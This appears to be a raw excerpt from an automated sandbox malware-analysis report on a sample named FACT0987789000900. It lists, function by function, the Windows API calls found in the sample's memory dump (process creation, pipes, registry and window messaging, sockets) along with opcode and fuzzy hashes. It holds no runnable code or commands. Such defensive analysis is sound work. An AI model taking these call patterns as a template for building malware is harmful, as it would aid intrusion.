                                                                                                                  • Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004F915C
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004F9163
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004F9178
                                                                                                                • DestroyWindow.USER32(?), ref: 004F9180
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: 4c41e8bffb54b76e8db6eb8909ed06bf450adec297c9ce73e8e11f44a7984843
                                                                                                                • Instruction ID: aa7775b3c96201327626dbebe4bf4d2d5414dfd35d6a6eaf6cf13e67e7d8b543
                                                                                                                • Opcode Fuzzy Hash: 4c41e8bffb54b76e8db6eb8909ed06bf450adec297c9ce73e8e11f44a7984843
                                                                                                                • Instruction Fuzzy Hash: D021807160020ABBFF104F659D85FBB37ADEB95368F10462AFA1492290C735DC52A764
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 004D9588
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D95B9
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 004D95CB
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004D9605
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 0d66b54a777a28037fa00a249380d203831de721dc3e8259f6e8a69178414c25
                                                                                                                • Instruction ID: 780067d0eaee5bd5f55c02efddb4d32a74cbb3b24d61a7b9fa256eaf2c6a8f15
                                                                                                                • Opcode Fuzzy Hash: 0d66b54a777a28037fa00a249380d203831de721dc3e8259f6e8a69178414c25
                                                                                                                • Instruction Fuzzy Hash: F2219C71600205BBDB219F25EC24A9A7BF8AF55324F204A2BF8A1D73D0D774DD45CB24
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004D9653
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D9683
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004D9694
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004D96CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: adb85761b445744a6184a6dfa5ad514efd4a021f8ca1b796ed0e2942bac64b15
                                                                                                                • Instruction ID: 6f19231aa823fa7d644e1abb34afd20bc3ecd1ae2fe93c64d7bd39d41074ceb9
                                                                                                                • Opcode Fuzzy Hash: adb85761b445744a6184a6dfa5ad514efd4a021f8ca1b796ed0e2942bac64b15
                                                                                                                • Instruction Fuzzy Hash: E921AF71600205ABDB209F698C24E9AB7F8AF55724F204A5BF8B1E33D0E774DC45CB28
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004DDB0A
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004DDB5E
                                                                                                                • __swprintf.LIBCMT ref: 004DDB77
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0052DC00), ref: 004DDBB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: c6bf4ec416e8b3ef4ad148e73ed159a44842ee146de9ad615b7bcfac63497be5
                                                                                                                • Instruction ID: 3717a4386974f24a702cef866d62abba778fb808d0206428675cc1c46fa82a37
                                                                                                                • Opcode Fuzzy Hash: c6bf4ec416e8b3ef4ad148e73ed159a44842ee146de9ad615b7bcfac63497be5
                                                                                                                • Instruction Fuzzy Hash: 5E219D35A00108AFCB10EBA5D985DEEBBB8EF49708B10406AF509E7251DB75EA05CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004CC84A
                                                                                                                  • Part of subcall function 004CC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004CC85D
                                                                                                                  • Part of subcall function 004CC82D: GetCurrentThreadId.KERNEL32 ref: 004CC864
                                                                                                                  • Part of subcall function 004CC82D: AttachThreadInput.USER32(00000000), ref: 004CC86B
                                                                                                                • GetFocus.USER32 ref: 004CCA05
                                                                                                                  • Part of subcall function 004CC876: GetParent.USER32(?), ref: 004CC884
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004CCA4E
                                                                                                                • EnumChildWindows.USER32(?,004CCAC4), ref: 004CCA76
                                                                                                                • __swprintf.LIBCMT ref: 004CCA90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 3187004680-1110647743
                                                                                                                • Opcode ID: 9cbbfbc685844e55732418eecc9b1f690c48cf331694873ba0cd03f459a6913c
                                                                                                                • Instruction ID: 3a09df3d09aee12e5d8958dd1efe4901639360996ece5ecf0f45b3fbdd668051
                                                                                                                • Opcode Fuzzy Hash: 9cbbfbc685844e55732418eecc9b1f690c48cf331694873ba0cd03f459a6913c
                                                                                                                • Instruction Fuzzy Hash: 291172755002096BDF51BF619CC9FEA3B78AF45718F00806FFA0CAA182CB799545DB74
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004FE33D
                                                                                                                • _memset.LIBCMT ref: 004FE34C
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00553D00,00553D44), ref: 004FE37B
                                                                                                                • CloseHandle.KERNEL32 ref: 004FE38D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID: D=U
                                                                                                                • API String ID: 3277943733-4181397963
                                                                                                                • Opcode ID: 6ed3cc66454d7710967c0d67524a474549b8c804507cc566ccfd25e311ecf088
                                                                                                                • Instruction ID: 5d674346746780add819cb700d5167a646d2bca957325130295d10ec865e882c
                                                                                                                • Opcode Fuzzy Hash: 6ed3cc66454d7710967c0d67524a474549b8c804507cc566ccfd25e311ecf088
                                                                                                                • Instruction Fuzzy Hash: 8DF05EF1540304BAE7101B61AC55FB77EBCEB147D6F004422BF0CDA1A2E3799E14A6B8
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004F19F3
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004F1A26
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004F1B49
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004F1BBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: 299f732058b8ada78663fb3237d755932443c7a22260ce029b34c8ac493233fa
                                                                                                                • Instruction ID: aff7bbb00ee4d0120b1a125e204251c0dcb944a3c33ceb3d27b264f1b5e4214a
                                                                                                                • Opcode Fuzzy Hash: 299f732058b8ada78663fb3237d755932443c7a22260ce029b34c8ac493233fa
                                                                                                                • Instruction Fuzzy Hash: BC81A670600204EBDF10EF65C886BAEBBE5AF15724F04845EF905AF392D7B9A941CB94
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004FE1D5
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004FE20D
                                                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 004FE248
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004FE269
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004FE281
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188977179-0
                                                                                                                • Opcode ID: 8e2b996020f754ec0a7cdfa41bedc9180cbb618c497429dadb2b546c09be5cd2
                                                                                                                • Instruction ID: a76eb093a67d7dcdddb7ef0c7ce3210ba844e504210a127404eb76ce666afc28
                                                                                                                • Opcode Fuzzy Hash: 8e2b996020f754ec0a7cdfa41bedc9180cbb618c497429dadb2b546c09be5cd2
                                                                                                                • Instruction Fuzzy Hash: 9F61A234600618AFDB20CF5AC954FBB7BBAEF49302F04405BFA559B3A1C779A940CB19
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004D1CB4
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 004D1D26
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 004D1D81
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004D1DF8
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004D1E26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4136290138-0
                                                                                                                • Opcode ID: 7a1069fa6f5215f8f40b95be3661336ab870116077d4b213d59b4ac9edf699f8
                                                                                                                • Instruction ID: 410b82632dd1ea850d25d5d73413af5ff3e81a17c02237a9dd77e89ee510aa6a
                                                                                                                • Opcode Fuzzy Hash: 7a1069fa6f5215f8f40b95be3661336ab870116077d4b213d59b4ac9edf699f8
                                                                                                                • Instruction Fuzzy Hash: C75167B5A00209AFCB14CF58C890AAAB7B9FF4C314B15855AED59DB311E334EA11CFA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004F06EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004F077D
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004F079B
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004F07E1
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 004F07FB
                                                                                                                  • Part of subcall function 004AE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004DA574,?,?,00000000,00000008), ref: 004AE675
                                                                                                                  • Part of subcall function 004AE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004DA574,?,?,00000000,00000008), ref: 004AE699
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: c7e93b16013c6b5ce5360ad44e96d61d5d7cec420154393ad22aff8ac068cba1
                                                                                                                • Instruction ID: 3c4c22b75b8db908a1258418973a641cff97e03d50b641b9712015d16272e1c9
                                                                                                                • Opcode Fuzzy Hash: c7e93b16013c6b5ce5360ad44e96d61d5d7cec420154393ad22aff8ac068cba1
                                                                                                                • Instruction Fuzzy Hash: 2E516175A00209DFCF00EFA9C481DADB7F5BF59314B0480AAEA15AB352DB38ED45CB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F2EEF
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004F2F2E
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004F2F75
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 004F2FA1
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004F2FAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3740051246-0
                                                                                                                • Opcode ID: 14450eaac17245e7140ee0c7b2a89c6e3e2adb40248a4b6ce92139fffa2a84a3
                                                                                                                • Instruction ID: 4e5d54a86aa154cec5bb32ef1f7624ff87f0e332d6ddd4359dfea9d4a165e062
                                                                                                                • Opcode Fuzzy Hash: 14450eaac17245e7140ee0c7b2a89c6e3e2adb40248a4b6ce92139fffa2a84a3
                                                                                                                • Instruction Fuzzy Hash: D9516D71218204AFCB04EF55C991E6BBBF9FF88308F00882EF65597291DB74E905DB66
                                                                                                                APIs
                                                                                                                • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 004E8E7C
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8E89
                                                                                                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 004E8EAD
                                                                                                                • _strlen.LIBCMT ref: 004E8EF7
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8F6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_strlenselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2217125717-0
                                                                                                                • Opcode ID: 785f56335231821b76eed82f14ee405196cad11e08d98007675f0237a78cc4ef
                                                                                                                • Instruction ID: 49d71281c5b8e4fa4f5d7230428d0a20cb333bc6916ed756aa73fd2e4ba7e1b2
                                                                                                                • Opcode Fuzzy Hash: 785f56335231821b76eed82f14ee405196cad11e08d98007675f0237a78cc4ef
                                                                                                                • Instruction Fuzzy Hash: B941B271900104AFCB14EBA6C995EAEB7B9AB58315F10456EF01A972D1DF38AE04CB68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 13ce57e0b832f998ba101b15c818868b38e9ad5558d714cd2a79815fc6e5a295
                                                                                                                • Instruction ID: a55d8ad1cd79a09e1ee3030aab558a3615f6eeb836e8f3257a083a4689555f1a
                                                                                                                • Opcode Fuzzy Hash: 13ce57e0b832f998ba101b15c818868b38e9ad5558d714cd2a79815fc6e5a295
                                                                                                                • Instruction Fuzzy Hash: 9941C43990021CABDB10DB68CD84FBABF78EB09310F144126EA59A72D1C778AD05D658
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004E12B4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004E12DD
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004E131C
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004E1341
